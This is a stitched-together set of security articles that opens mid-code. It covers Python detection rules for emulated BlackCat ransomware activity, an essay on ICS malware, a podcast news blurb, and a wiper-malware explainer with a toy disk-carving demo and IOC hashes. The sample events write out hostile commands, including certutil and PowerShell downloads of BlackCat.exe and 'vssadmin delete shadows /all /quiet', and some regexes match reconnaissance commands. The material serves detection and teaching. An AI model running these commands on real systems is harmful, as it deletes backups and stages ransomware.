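         _rx(r"\bnet(\.exe)?\s+use\b"), check_user=True),
    Rule("arp_cache", "T1016", SHELLS | {"arp.exe"},
         _rx(r"\barp(\.exe)?\s+-a\b"), check_user=True),
    Rule("dir_redirect", "T1083", SHELLS, _rx(r"\bdir\b[^>]*>")),
]


def evaluate(event: ProcEvent):
    """Return the names of the rules that fire for one process-creation event."""
    hits = []
    for rule in RULES:
        if event.process.lower() not in rule.processes:
            continue
        if not rule.pattern.search(event.cmdline):
            continue
        if rule.check_user and event.user.lower() in EXPECTED_NET_USERS:
            continue
        hits.append(rule.name)
    return hits


# Constructed sample records (not real telemetry); order matters for the usage below.
SAMPLE_EVENTS = [
    ProcEvent("powershell.exe", 'powershell -w hidden -c "IWR http://10.0.0.5/BlackCat.exe -OutFile C:\\Users\\Public\\BlackCat.exe"', "CORP\\jdoe"),
    ProcEvent("certutil.exe", "certutil -urlcache -split -f http://10.0.0.5/BlackCat.exe C:\\Users\\Public\\BlackCat.exe", "CORP\\jdoe"),
    ProcEvent("wmic.exe", "wmic csproduct get UUID", "CORP\\jdoe"),
    ProcEvent("cmd.exe", "cmd /c fsutil behavior set SymlinkEvaluation R2L:1 R2R:1", "CORP\\jdoe"),
    ProcEvent("cmd.exe", "cmd /c reg add HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters /v MaxMpxCt /t REG_DWORD /d 65535 /f", "CORP\\jdoe"),
    ProcEvent("vssadmin.exe", "vssadmin delete shadows /all /quiet", "CORP\\jdoe"),
    ProcEvent("cmd.exe", "cmd /c net use", "CORP\\netadmin"),   # allowlisted user: no alert
    ProcEvent("cmd.exe", "cmd /c arp -a", "CORP\\jdoe"),
    ProcEvent("cmd.exe", "cmd /c dir /s C:\\Finance > C:\\Users\\Public\\listing.txt", "CORP\\jdoe"),
    ProcEvent("powershell.exe", "powershell -c Get-Process", "CORP\\jdoe"),   # benign
    ProcEvent("cmd.exe", "cmd /c net use", "CORP\\jdoe"),       # same command, unexpected user
]


def run_samples():
    return [(e.process, evaluate(e)) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for proc, hits in run_samples():
        print(f"{proc:16} {hits or '-'}")
```

Each rule is scoped to the image names the page lists, so a download launched directly by a scheduled task or an Office macro child that is not cmd.exe or powershell.exe needs the parent-process context that a real SIEM query would add; the allowlist check applies only to the noisy net/arp rules, as the page suggests.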

9b. Mitigation Policies

Although these are benign Windows commands, they can be used maliciously once a threat actor holds a compromised account. To reduce this information disclosure, cmd.exe and powershell.exe should be restricted to the administrative users who need them.

Additionally, ensure that files and directories have proper permissions assigned to prevent unauthorized viewing or modification by underprivileged users.

Scenario 10: Data Encrypted for Impact (T1486): In the last step of the attack graph we mimic BlackCat’s encryption method: AES-128 in CTR mode, using the AES-NI hardware instructions where the CPU supports them, and falling back to ChaCha20 where it does not. In addition to the cipher itself, we also emulate parts of the distinctive encryption process used by BlackCat.

One of these steps is the use of a temporary checkpoint file written to disk, that serves as a position marker if file encryption is interrupted. A checkpoint file is written to disk for each file during the encryption process and then removed once the file has been fully encrypted. The name of this file is the name of the file being encrypted with the string “checkpoints-” prepended to it. This is a unique IOC and could be used in a detection signature.

Another nuance we’ve captured in the encryption scenario is BlackCat’s file extension exclusion list. The configuration block of BlackCat specifies file names, directories, and extensions to exclude from encryption, ensuring the host remains stable during the process and reducing the number of files to encrypt if they provide no ransom value.

We’ve also taken care to emulate the structure of the file after encryption, including an appended block of JSON that carries the per-file key (encrypted with the operators’ public key) and the other metadata required to decrypt the file.

10a. Detection Process

A detection rule could be written to catch the checkpoint file written to disk during the encryption process:

FileName starts_with “checkpoints-”

In addition, the following extensions are on the analysed sample’s exclusion list; BlackCat skips files with these extensions so that the host stays bootable and usable enough to display the ransom note:

.themepack, .nls, .diagpkg, .msi, .lnk, .exe, .cab, .scr, .bat, .drv, .rtp, .msp, .prf, .msc, .ico, .key, .ocx, .diagcab, .diagcfg, .pdb, .wpx, .hlp, .icns, .rom, .dll, .msstyles, .mod, .ps1, .ics, .hta, .bin, .cmd, .ani, .386, .lock, .cur, .idx, .sys, .com, .deskthemepack, .shs, .ldf, .theme, .mpa, .nomedia, .spl, .cpl, .adv, .icl, .msu

Because these are left alone, excessive modifications within a very short time window to files whose extensions are not on this list would be an indicator of this impact activity occurring in your environment.
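Both detection points in this scenario, the “checkpoints-” file name and a burst of modifications to files outside the exclusion list, work on file events rather than command lines. The following is an added example (not AttackIQ’s code) that applies them to a constructed stream of file events: one host where a process touches 60 user documents in six seconds (writing and removing a checkpoint file per document), the same host where a servicing process rewrites 60 DLLs in the same window, and a second host where a user saves a handful of files. The threshold (50 modifications), the window (10 seconds) and the process and path names are assumptions for this example; the extension list is the one above.

```python
from collections import defaultdict
from dataclasses import dataclass

# Extension exclusion list from the analysed sample's configuration (as listed on the page).
EXCLUDED_EXTENSIONS = {
    ".themepack", ".nls", ".diagpkg", ".msi", ".lnk", ".exe", ".cab", ".scr", ".bat",
    ".drv", ".rtp", ".msp", ".prf", ".msc", ".ico", ".key", ".ocx", ".diagcab",
    ".diagcfg", ".pdb", ".wpx", ".hlp", ".icns", ".rom", ".dll", ".msstyles", ".mod",
    ".ps1", ".ics", ".hta", ".bin", ".cmd", ".ani", ".386", ".lock", ".cur", ".idx",
    ".sys", ".com", ".deskthemepack", ".shs", ".ldf", ".theme", ".mpa", ".nomedia",
    ".spl", ".cpl", ".adv", ".icl", ".msu",
}
CHECKPOINT_PREFIX = "checkpoints-"
BURST_THRESHOLD = 50    # modifications within the window (assumed tuning value)
BURST_WINDOW_S = 10.0   # seconds (assumed tuning value)


@dataclass(frozen=True)
class FileEvent:
    ts: float       # epoch seconds
    host: str
    process: str
    action: str     # "create" | "modify" | "delete"
    path: str


def _basename(path: str) -> str:
    # Accept both separators so Windows paths parse on a Linux analysis host.
    return path.replace("\\", "/").rsplit("/", 1)[-1]


def extension(path: str) -> str:
    name = _basename(path)
    return name[name.rfind("."):].lower() if "." in name else ""


def is_checkpoint(path: str) -> bool:
    return _basename(path).lower().startswith(CHECKPOINT_PREFIX)


def checkpoint_alerts(events):
    """Every creation of a 'checkpoints-<name>' file is an alert on its own."""
    return [e for e in events if e.action == "create" and is_checkpoint(e.path)]


def burst_alerts(events):
    """Sliding-window count of modifications to non-excluded files per (host, process).

    Returns one alert per (host, process) as (key, window_start, window_end, count)
    the first time the count reaches BURST_THRESHOLD inside BURST_WINDOW_S.
    """
    stamps_by_key = defaultdict(list)
    for e in sorted(events, key=lambda ev: ev.ts):
        if e.action != "modify" or extension(e.path) in EXCLUDED_EXTENSIONS:
            continue                      # excluded extensions never count toward a burst
        stamps_by_key[(e.host, e.process)].append(e.ts)

    alerts = []
    for key, stamps in stamps_by_key.items():
        start = 0
        for end in range(len(stamps)):
            while stamps[end] - stamps[start] > BURST_WINDOW_S:
                start += 1            # slide the window forward
            count = end - start + 1
            if count >= BURST_THRESHOLD:
                alerts.append((key, stamps[start], stamps[end], count))
                break
    return alerts


def build_sample_events():
    """Constructed file events (not real telemetry)."""
    t0 = 1_700_000_000.0
    events = []
    for i in range(60):   # ransomware-like: 60 documents in 6 s, checkpoint per document
        doc = f"C:\\Users\\jdoe\\Documents\\report-{i}.docx"
        cp = f"C:\\Users\\jdoe\\Documents\\checkpoints-report-{i}.docx"
        events.append(FileEvent(t0 + i * 0.1, "WS01", "BlackCat.exe", "create", cp))
        events.append(FileEvent(t0 + i * 0.1, "WS01", "BlackCat.exe", "modify", doc))
        events.append(FileEvent(t0 + i * 0.1 + 0.05, "WS01", "BlackCat.exe", "delete", cp))
    for i in range(60):   # benign: servicing stack rewriting DLLs (excluded extension)
        events.append(FileEvent(t0 + i * 0.1, "WS01", "TiWorker.exe", "modify",
                                f"C:\\Windows\\System32\\lib{i}.dll"))
    for i in range(5):    # benign: a user saving a few documents
        events.append(FileEvent(t0 + i, "WS02", "WINWORD.EXE", "modify",
                                f"C:\\Users\\asmith\\notes-{i}.docx"))
    return events


if __name__ == "__main__":
    evs = build_sample_events()
    print("checkpoint files created:", len(checkpoint_alerts(evs)))
    for key, ws, we, n in burst_alerts(evs):
        print(f"burst on {key}: {n} modifications in {we - ws:.1f}s")
```

The burst rule deliberately ignores the excluded extensions, so a patch cycle rewriting hundreds of DLLs does not fire, while an encryptor working through user documents does. In production the window and threshold need tuning per host class (a file server sees far more legitimate modifications than a laptop), and the checkpoint-name rule should be combined with the burst rule rather than used alone, since any process could create a file with that prefix.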

10b. Mitigation Policies

MITRE mitigation Recommendations for T1486:

M1040
M1053

In summary, AttackIQ’s new malware emulation attack graphs emulate core techniques and procedures designed into the malware as a crucial part of an adversary’s overall kill chain. With data generated from continuous testing and use of this attack graph, you can focus your teams on achieving key security outcomes, adjusting your security controls, and working to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ stands at the ready to help security teams implement this attack graph and other aspects of the AttackIQ Security Optimization Platform, including through our co-managed security service, AttackIQ Vanguard.

The post Announcing AttackIQ’s Malware Emulation Attack Graphs appeared first on AttackIQ.

Engineers, whether working on energy grids or power generation or resource exploitation, are building and maintaining the networks and systems which will be the targets of future ICS malware.

And although we are more aware of threats than ever before, a future attempt to disable safety systems or overload a network with malicious traffic to cause harm will certainly occur, writes Jason Atwell, Principal Advisor of Global Intelligence at Mandiant.

Shortly before Christmas in 2015 the power grid in Ukraine suffered a series of outages that affected roughly a quarter of a million customers and lasted several hours.[1] Later, in 2017, the same group used NotPetya, destructive malware disguised as ransomware, to shut down servers all over Ukraine, including at the infamous Chernobyl nuclear power plant.[2] The actor behind these attacks is a Russian state-sponsored group known as “Sandworm.” Because of the role this group has played in defining the scope of the threat cyber actors pose to power grids, cyber professionals and intelligence analysts around the globe have been watching keenly for any evidence of its activity during the current crisis in Ukraine.

Sandworm might be the most infamous group currently known for ICS malware, that is, malware intended specifically to target industrial control systems (ICS) such as programmable logic controllers (PLCs) or OPC Unified Architecture (OPC UA) servers. This type of malware, while still relatively rare, is more common now than a decade ago and has increasingly proven capable of achieving dangerous and widespread effects on targeted networks globally.

Ukraine has had the unfortunate distinction of being the place where one of the most noteworthy incidents involving such malware has occurred, but it is far from the only one, and will not be the last to deal with incidents involving it. As anyone who works in the overlapping fields of cyber and engineering knows, it isn’t necessarily the threats or failures you’ve identified that will hurt you, it might be the ones no one has thought of.

The Russian focus on Ukraine’s power grid in particular, and how it has evolved over time, offers valuable lessons for network defenders and industrial engineers as they prepare grids to be resilient against future attacks of this kind.


Exploration of energy sector significance

It is no mistake that most of the discovered ICS malware targets energy, or energy-related, functions and systems. When keeping in mind the intended effects, and the state-sponsored groups behind these capabilities, energy becomes a logical target for ICS malware. Energy plays a critical role in the dynamics of international geopolitics. When nation-states confront one another, the energy sector is often at the center of tensions.

This is because of the critical role energy plays in several key factors, such as internal stability through essential services, economic health due to the huge role oil and gas play in many economies, the effects of compliance that can be achieved when crucial suppliers deny or fail to deliver fuel, and finally it is a rapidly digitizing industry on the forefront of competition between the world’s great powers, making it a fertile ground for testing cyber capabilities in a way that sends a quick and direct message.

Besides Ukraine, Saudi Arabia has experienced cyber attacks directed against its energy sector, attacks that were both destructive and highly creative in their methodology. Triton malware, which incidentally is also linked to Russia, was used in an attempt to cause physical damage at a Saudi petrochemical facility by disabling key safety systems, specifically the safety instrumented system (SIS) controllers and the hardware and software platform used to coordinate across multiple devices.

This focus on eliminating the monitoring, coordination, and redundancy that is essential to modern safety systems could have made the impact of this attack devastating had it fully succeeded. Despite failing, it is understandable why such an attack could benefit a country like Russia, which was assessed to be behind Triton malware and subsequently sanctioned for its development.[3] Russia is in the top tier of nations that both profit from, and are largely dependent on, the energy market.

In past wars the bombing of oil and gas facilities was a priority effort; in future wars the same effects[4] might be achievable from afar using a network connection and a custom malware kit, decreasing the risk to the attacker while increasing the speed and scale of destruction.

Discussion of malware functions and effects

One of the most significant recent developments in ICS malware was the proactive detection and mitigation of a campaign designed to use INCONTROLLER malware against machine automation devices, specifically those able to interact with particular industrial equipment used across multiple industries. The apparent goal was to interact with that equipment in a way that disables safety features, similar to Triton discussed above.[5]


Future Scenarios

Russia’s attempts to take out critical components of the electrical grid using cyber attacks may have been limited in scope and mostly unsuccessful, especially in terms of Ukraine’s ability to quickly recover, but they do show us where ICS malware and its capabilities are headed in the future. Like many other kinds of malware, ICS malware is increasingly focused on infiltrating the commonalities across systems and networks in order to have the greatest chance of exploitation and success.

That means a focus on widely adopted technology, the coding language used to communicate between them, and the software suites that enable multiple processes. In the future, because malicious actors are increasingly aware of what these critical nodes and common overlays are, attacks will be even more stealthy in how they infiltrate supply chains and achieve effects rapidly, both using our engineering processes against us and taking into account detection and response capabilities.

Mitigation

From an engineering perspective, there are some basic concepts that can help address the rising threat posed by ICS-specific malware. Additionally, the cyber security field is heavily engaged in hardening ICS networks and responding to incidents when they occur. Marrying these parallel efforts is an important part of having a strategic approach to this issue.

First, the earlier in a design process that cyber security can be addressed, the better. A resilient design should include not only redundancies, but ways to check if those redundancies are balancing one another effectively. This eliminates a vector for a bad actor to use safety processes against the system.

Second, operating procedures, either in design or in practice, should include the necessary time and resources to review data and indicators for signs of malicious activity. This includes updates, maintenance, and tests. Malicious activity may not be detectable, even on a secured network, if too much trust is placed in “operations as usual” as an indicator of a secure system.


Third and final, supply chain issues, in terms of new procurement, upgrades and enhancements, should be addressed as part of the design and build of resilient networks. Reviewing code or hardware for faults or signs of manipulation should be just as important as checking the loads or capacities of more traditional equipment and physical plants. The strongest pipeline or best insulated cable in the world won’t do much good if it’s connected to a compromised piece of network hardware purchased from an entity at odds with the geopolitical stance of the buyer’s host nation or corporate structure. Threat intelligence and past incident case studies can be immensely useful in determining how best to address these three areas for consideration.

Conclusion

Engineers, whether working on energy grids or power generation or resource exploitation, are building and maintaining the networks and systems which will be the targets of future ICS malware. This potential attack surface is complex and growing. The good news is we are more aware of threats than ever before, and the resources dedicated to addressing them are maturing and becoming more accessible. A future attempt to disable safety systems or overload a network with malicious traffic to cause harm will certainly occur, and probably sooner than later, but its actual outcome is largely up to us, not the attacker.

Jason Atwell

About the Author:

Jason Atwell is Principal Advisor of Global Intelligence at Mandiant. Atwell helps oversee the Strategic Intelligence & Government and Global Government Consulting practices. Atwell has over 18 years of experience in cyber and risk intelligence from across the military, government, and commercial sectors.

References

[1] https://www.reuters.com/article/us-ukraine-cybersecurity-sandworm-idUSKBN0UM00N20160108

[2] https://www.independent.co.uk/tech/chernobyl-ukraine-petya-cyber-attack-hack-nuclear-power-plant-danger-latest-a7810941.html

[3] https://home.treasury.gov/news/press-releases/sm1162

[4] https://www.reuters.com/article/us-ukraine-cybersecurity-sandworm-idUSKBN0UM00N20160108

[5] https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool

This article was originally published on Power Engineering.


An upswing in malware deployed against targets in Eastern Europe. Cozy Bear is typosquatting. CuckooBees swarm around intellectual property. Tracking the DPRK’s hackers. Quiet persistence in corporate networks. CISA issues an ICS advisory. Caleb Barlow on backup communications for your business during this period of “shields up.” Duncan Jones from Cambridge Quantum sits down with Dave to discuss the NIST algorithm finalist Rainbow vulnerability. And, hey, officer, honest, it was just a Squirtle….

For links to all of today’s stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/86

Selected reading.

Update on cyber activity in Eastern Europe (Google) 

Multiple government hacking groups stay busy targeting Ukraine and the region, Google researchers say (CyberScoop)

Google: Nation-state phishing campaigns expanding to target Eastern Europe orgs (The Record by Recorded Future)

SolarWinds hackers set up phony media outlets to trick targets (CyberScoop) 

SOLARDEFLECTION C2 Infrastructure Used by NOBELIUM in Company Brand Misuse (Recorded Future) 

Experts discover a Chinese-APT cyber espionage operation targeting US organizations (VentureBeat)

Operation CuckooBees: Cybereason Uncovers Massive Chinese Intellectual Property Theft Operation (Cybereason Nocturnus) 

Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques (Cybereason) 

Chinese hackers cast wide net for trade secrets in US, Europe and Asia, researchers say (CNN) 

Researchers tie ransomware families to North Korean cyber-army (The Record by Recorded Future)

The Hermit Kingdom’s Ransomware Play (Trellix)

New espionage group is targeting corporate M&A (TechCrunch) 

Cyberespionage Group Targeting M&A, Corporate Transactions Personnel (SecurityWeek) 

UNC3524: Eye Spy on Your Email (Mandiant) 

Yokogawa CENTUM and ProSafe-RS (CISA) 

Cops ignored call to nearby robbery, preferring to hunt Pokémon (Graham Cluley)


Executive summary

2022 has seen an increase in the number of wiper variants targeting Ukrainian entities.
This blog post explains how wipers work and what makes them so effective, and provides a short overview of the most recent samples that have appeared in the Eastern Europe geopolitical conflict.

How does wiper malware work?

A wiper’s main objective is to destroy data on any storage device and make the information unavailable (T1485). There are two ways of removing files, logical and physical.

Logical file removal is the most common way of erasing a file, performed by users daily when a file is sent to (and emptied from) the Recycle Bin or removed from the command line or terminal with del/rm. This action deletes the pointer to the file but not the file data, leaving it recoverable with forensic tools as long as the operating system does not write another file to the same physical location.

Wipers, however, aim to make the data irrecoverable, so they remove the data at the physical level of the disk. The most effective way to do this is to overwrite the specific physical location with other data (usually a repeated byte such as 0xFF, or random bytes). This usually involves writing gigabytes (or terabytes) to disk and can be time consuming. For this reason, in addition to destroying the data, many wipers first destroy two special structures on the system:

The Master Boot Record (MBR), which is used during the boot process to locate the operating system on the disk. Overwriting the MBR makes the boot process fail, leaving the files inaccessible unless forensic methods are used.
The Master File Table (MFT), which is specific to NTFS and holds each file’s physical location on the drive, its logical and physical size, and its metadata. A large file that cannot be stored in consecutive blocks is fragmented across the disk, and the MFT records where each fragment lives. Destroying the MFT forces the use of file-carving tools even for unfragmented files (and outright loses small files whose data is stored resident inside their MFT record), and effectively prevents recovery of fragmented files because the links between fragments are lost.
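The difference between a logical delete, a physical overwrite, and the loss of the file table is easiest to see on a toy disk. The following is an added example (not part of the original post) that models a tiny block device with a name-to-blocks table standing in for the MFT and a signature-based carver standing in for the forensic tool. Three scenarios are run: a logically deleted file is carved back intact; a file whose blocks were overwritten with 0xCC is gone; and after the table is destroyed, an unfragmented file still carves but a fragmented one comes back truncated while its stray fragment contaminates a neighbour. The 64-byte block geometry, the file contents and the “%PDF-” header signature are constructed for the example.

```python
BLOCK = 64        # toy geometry (constructed): 64-byte blocks, 16 of them
NBLOCKS = 16
MAGIC = b"%PDF-"  # header signature the carver looks for


class ToyDisk:
    def __init__(self):
        self.data = bytearray(NBLOCKS * BLOCK)   # raw sectors
        self.table = {}     # name -> (length, [blocks]); stands in for the MFT
        self.free = list(range(NBLOCKS))

    def block(self, b):
        return bytes(self.data[b * BLOCK:(b + 1) * BLOCK])

    def write(self, name, content):
        blocks = []
        for off in range(0, len(content), BLOCK):
            b = self.free.pop(0)     # lowest free block first: fragments after deletions
            chunk = content[off:off + BLOCK]
            self.data[b * BLOCK:b * BLOCK + len(chunk)] = chunk
            blocks.append(b)
        self.table[name] = (len(content), blocks)

    def read(self, name):
        length, blocks = self.table[name]
        return b"".join(self.block(b) for b in blocks)[:length]

    def logical_delete(self, name):
        # del / rm: drop the table entry and free the blocks; the bytes stay on disk.
        _, blocks = self.table.pop(name)
        self.free = sorted(self.free + blocks)

    def wipe(self, name, fill=b"\xcc"):
        # Physical removal: overwrite every block of the file, then drop the entry.
        _, blocks = self.table[name]
        for b in blocks:
            self.data[b * BLOCK:(b + 1) * BLOCK] = fill * BLOCK
        self.logical_delete(name)

    def destroy_table(self):
        self.table.clear()   # losing the MFT: names, lengths and block chains are gone


def carve(disk):
    """Recover files by header signature alone, with no table to consult.

    A file is assumed to start at a block beginning with MAGIC and to continue
    through following blocks until the next header or an all-zero block.
    """
    found, b = [], 0
    while b < NBLOCKS:
        blk = disk.block(b)
        if not blk.startswith(MAGIC):
            b += 1
            continue
        blob = bytearray(blk)
        b += 1
        while b < NBLOCKS:
            nxt = disk.block(b)
            if nxt.startswith(MAGIC) or not nxt.strip(b"\0"):
                break
            blob += nxt
            b += 1
        found.append(bytes(blob).rstrip(b"\0"))
    return found


# Constructed file contents (no NUL bytes, so trailing-NUL stripping is lossless).
A = MAGIC + b"A" * 100   # 2 blocks
B = MAGIC + b"B" * 200   # 4 blocks
C = MAGIC + b"C" * 150   # 3 blocks


def scenario_logical_delete():
    d = ToyDisk()
    d.write("a.pdf", A)
    d.logical_delete("a.pdf")
    return carve(d) == [A]          # pointer gone, data still carveable


def scenario_wipe():
    d = ToyDisk()
    d.write("a.pdf", A)
    d.wipe("a.pdf")
    return carve(d) == []           # blocks overwritten, nothing to carve


def scenario_table_loss():
    d = ToyDisk()
    d.write("a.pdf", A)             # blocks 0,1
    d.write("tmp.bin", b"T" * 64)   # block 2
    d.write("b.pdf", B)             # blocks 3-6
    d.logical_delete("tmp.bin")     # frees block 2
    d.write("c.pdf", C)             # reuses block 2, then 7,8: fragmented
    c_blocks = d.table["c.pdf"][1]
    d.destroy_table()
    blobs = carve(d)
    return {
        "c_blocks": c_blocks,
        "a_ok": A in blobs,                                   # contiguous: recovered
        "c_ok": C in blobs,                                   # fragmented: only first block found
        "b_contaminated": any(x.startswith(B) and x != B for x in blobs),
    }


if __name__ == "__main__":
    print("logical delete carveable:", scenario_logical_delete())
    print("wiped file carveable:   ", not scenario_wipe())
    print("after table loss:", scenario_table_loss())
```

The carver here is deliberately naive; real tools use footers and format-specific length fields, which would stop the bleed of c.pdf’s stray fragment into b.pdf, but nothing short of the table can reconnect the fragments of c.pdf, which is the point the MFT paragraph above makes.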

The main difference between wipers and ransomware is that it’s impossible to retrieve the impacted information after a wiper attack. Attackers using wipers do not usually target financial reward but intend to disrupt the victim’s operations as much as possible. Ransomware operators aim to get a payment in exchange for the key to decrypt the user’s data.

With both wiper and ransomware attacks, the victim depends on their back up system to recover after an attack. However, even some wiper attacks carry ransom notes requesting a payment to recover the data. It is important that the victim properly identifies the attack they’ve suffered, or they may pay the ransom without any chance of retrieving the lost data.

In the last month and a half, since the war started in Eastern Europe, several wipers have been used in parallel with DDoS attacks (T1499) to keep financial institutions and government organizations, mainly Ukrainian, inaccessible for extended periods of time. Some of the wipers observed in this timeframe have been: WhisperKill, HermeticWiper, IsaacWiper, CaddyWiper, DoubleZero Wiper and AcidRain.

Most recent wiper examples

WhisperKill

On January 14, 2022, the Ukrainian government experienced a coordinated attack that defaced the websites of 22 of its agencies. Almost all the compromised websites had been developed by the same Ukrainian IT company, Kitsoft, and all were built on OctoberCMS. The attack vector was therefore most probably a supply chain attack on the IT provider or exploitation of an OctoberCMS vulnerability, combined with exploitation of the Log4Shell vulnerability (T1190).


Figure 1. Example of defaced Ukrainian government website.

In addition to the website defacements, the Microsoft Threat Intelligence Center (MSTIC) reported destructive malware targeting Ukrainian organizations in the form of two malware samples. Microsoft named the family WhisperGate, while other security companies use WhisperGate for the downloader and WhisperKill for the actual wiper, treating the wiper as a component of WhisperGate.

The identified files were:

Stage 1 overwrites the Master Boot Record (MBR) with code that displays a ransom note, so the machine is unbootable from the next power cycle onward; on boot the system shows the note in Figure 2. Despite the ransom request, the data is not recoverable, since everything WhisperKill does is aimed at destroying data, not encrypting it. The wallet address is most probably a decoy intended to confuse attribution.


Figure 2. Ransom note obtained by MSTIC.

Stage 2 attempts to download the next-stage payload (T1102.003) from a Discord CDN URL; if unsuccessful, it sleeps and tries again. The downloaded payload destroys as much data as possible by overwriting the first 1 MB of files of selected types with the byte 0xCC, then renames each file with a random four-byte extension. By selecting the file types to wipe and overwriting only the first megabyte, the attackers optimize the wiping process: no time is spent on system files, and each file is abandoned as soon as it is unrecoverable. Finally, the malware runs a command to delete itself from the system (T1070.004).

HermeticWiper

A month later, on February 23, 2022, ESET Research reported a new wiper being used against hundreds of Ukrainian systems. The wiper takes its name from the code-signing certificate issued to “Hermetica Digital Ltd” that it used to bypass security controls (T1588.003). According to a Reuters article, the certificate may have been obtained by impersonating the company and requesting a new certificate rather than by stealing an existing one.


Figure 3. Hermetica Digital Ltd certificate.

The attackers have been seen using several methods to distribute the wiper across the domain: domain Group Policy Objects (GPO) (T1484.001), Impacket or SMB (T1021.002), and WMI (T1047), plus an additional worm component named HermeticWizard.

The wiper component first installs its payload as a service (T1569.002) under C:\Windows\System32\Drivers. The service then corrupts the first 512 bytes (the MBR) of every physical drive and enumerates their partitions. Before attempting to overwrite as much data as it can, it deletes key files in each partition: the $MFT, $Bitmap and $LogFile, the NTUSER registry hives (T1112), and the event logs (T1070.001).

On top of deleting key file system structures, it also deliberately fragments the drive (breaking files up and scattering the pieces, the opposite of the defragmentation an operating system performs to improve performance). The combination of fragmentation and MFT deletion makes file recovery difficult, since files are scattered across the drive in small parts with nothing recording where each part lives.

Finally, the malware writes random content into all occupied sectors of the partition, removing any remaining hope of recovering data with forensic tools or procedures.

IsaacWiper

A day after the initial destructive attack with HermeticWiper, on February 24, 2022, a new wiper was used against the Ukrainian government, as reported by ESET, without any significant similarity to the HermeticWiper used the day before.

IsaacWiper identifies all physical drives that do not contain the operating system and locks their logical partitions, allowing only a single thread to access each. It then writes random data to the drives in 64 KB chunks. With one thread per volume, the wiping process is very slow.

Once the other physical drives, and the logical partitions sharing a physical drive with the operating system volume, have been wiped, the system volume itself is wiped by:

Erasing the MBR.
Overwriting all files with 64 KB chunks of random data from a single thread.
Creating a new file on the C: drive that is filled with random data until it has consumed all remaining space in the partition, overwriting the already overwritten files again. This runs on a separate thread, but it still takes a long time to cover the full partition, since both concurrent threads are effectively writing random data across the whole disk.

Figure 4. IsaacWiper strings.

When comparing IsaacWiper to WhisperKill, the attackers’ priorities become clear. WhisperKill’s creators prioritized speed and the number of affected files over ensuring the full drive is overwritten, since only 1 MB of each file was overwritten. On the other hand, IsaacWiper’s creators gave total priority to delivering the most effective wiper, no matter how long it takes to overwrite the full physical disk.

AcidRain

On the same day IsaacWiper was deployed, another wiper, named AcidRain by SentinelLABS, attacked Viasat KA-SAT modems in Ukraine. This wiper was aimed specifically at modems, probably to disrupt Internet access from Ukraine. It showed similarities to VPNFilter, a previously seen botnet targeting modems and routers that was used in 2018 to exploit vulnerabilities in several common router brands: Linksys, MikroTik, NETGEAR, and TP-Link. Exploiting those vulnerabilities allowed the attackers to obtain Initial Access inside all types of networks, where the bot would search for Modbus traffic to identify infected systems connected to Industrial Control Systems (ICS).

The wiper used was an ELF MIPS binary targeting Viasat KA-SAT modems, which first overwrites any file outside the common *nix installation directories (bin, boot, dev, lib, proc, sbin, sys, usr, etc.) and then deletes data from the devices under /dev/.

CaddyWiper

The first version of CaddyWiper was discovered by ESET researchers on 2022-03-14 when it was used against a Ukrainian bank. This new wiper does not have any significant code similarities to previous wipers. This sample specifically sets an exclusion to avoid wiping Domain Controllers. Afterwards, it targets C:/Users and any additional attached drive all the way to letter Z:/ and zeroes all the files present in those folders/drives. Finally, the extended information of the physical drives is destroyed, including the MBR and partition entries.

A variant of CaddyWiper was used again on 2022-04-08 14:58 against high-voltage electrical substations in Ukraine. This latest version of the wiper was delivered together with Industroyer2, an evolution of Industroyer, whose main function is to communicate with industrial equipment. In this case, the wiper was used with the purpose of slowing down the recovery process from the Industroyer2 attack and the regaining of control over the ICS consoles, as well as covering the tracks of the attack. According to WeLiveSecurity, who have been cooperating with CERT-UA in this investigation, the Sandworm Team is behind this latest attack.

In this same attack against the energy station in Ukraine, other wiper samples for Linux and Solaris were observed by WeLiveSecurity. These wipers leverage the shred command if present; otherwise they fall back to the basic dd or rm commands to wipe the system.

DoubleZero wiper

On March 22, 2022, CERT-UA reported a new wiper used against Ukrainian infrastructure and enterprises. Named DoubleZero, the wiper was distributed as a ZIP file containing an obfuscated .NET program. The wiper’s routine sets a hardcoded list of system directories, which are skipped during an initial wiping pass targeting user files. Afterwards, the skipped system directories are targeted, and finally the registry hives: HKEY_LOCAL_MACHINE (containing the hives Sam, Security, Software and System), HKEY_CURRENT_USER and HKEY_USERS.

There are two wiping methods, both of which zero out the selected file.

Figure 5. DoubleZero first wiping function.

Conclusion

As we have seen in the examples above, the main objective of the attackers behind wipers is to destroy all possible data and render systems unbootable (if possible), potentially requiring a full system restore if backups aren’t available. These malware attacks can be as disruptive as ransomware attacks, but wipers are arguably worse since there is no potential escape door of a payment to recover the data.

There are plenty of ways to wipe systems. We’ve looked at 6 different wiper samples observed targeting Ukrainian entities. These samples approach the attack in very different ways, and most of them complete faster than the time required to respond. For that reason, detection of wiper malware is not effective on its own: once the wiper is running on the system, it is already too late. The best approach against wipers is to prevent the intrusion in the first place, by keeping systems up to date and by increasing cybersecurity awareness. In addition, the consequences can be ameliorated by having periodic backup copies of key infrastructure available.

Associated indicators (IOCs)

The following technical indicators are associated with the reported intelligence. A list of indicators is also available in the following OTX Pulses:

WhisperKill
HermeticWiper and IsaacWiper
AcidRain
CaddyWiper
DoubleZero

Please note, the pulses may include other activities related but out of the scope of the report.

TYPE     INDICATOR                                                          DESCRIPTION
SHA256   a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92   WhisperKill (stage1.exe)
SHA256   dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78   WhisperKill (stage2.exe)
SHA256   0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da   HermeticWiper
SHA256   1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591   HermeticWiper
SHA256   13037b749aa4b1eda538fda26d6ac41c8f7b1d02d83f47b0d187dd645154e033   IsaacWiper
SHA256   9b4dfaca873961174ba935fddaf696145afe7bbf5734509f95feb54f3584fd9a   AcidRain
SHA256   47f521bd6be19f823bfd3a72d851d6f3440a6c4cc3d940190bdc9b6dd53a83d6   AcidRain
SHA256   fc0e6f2effbfa287217b8930ab55b7a77bb86dbd923c0e8150551627138c9caa   CaddyWiper
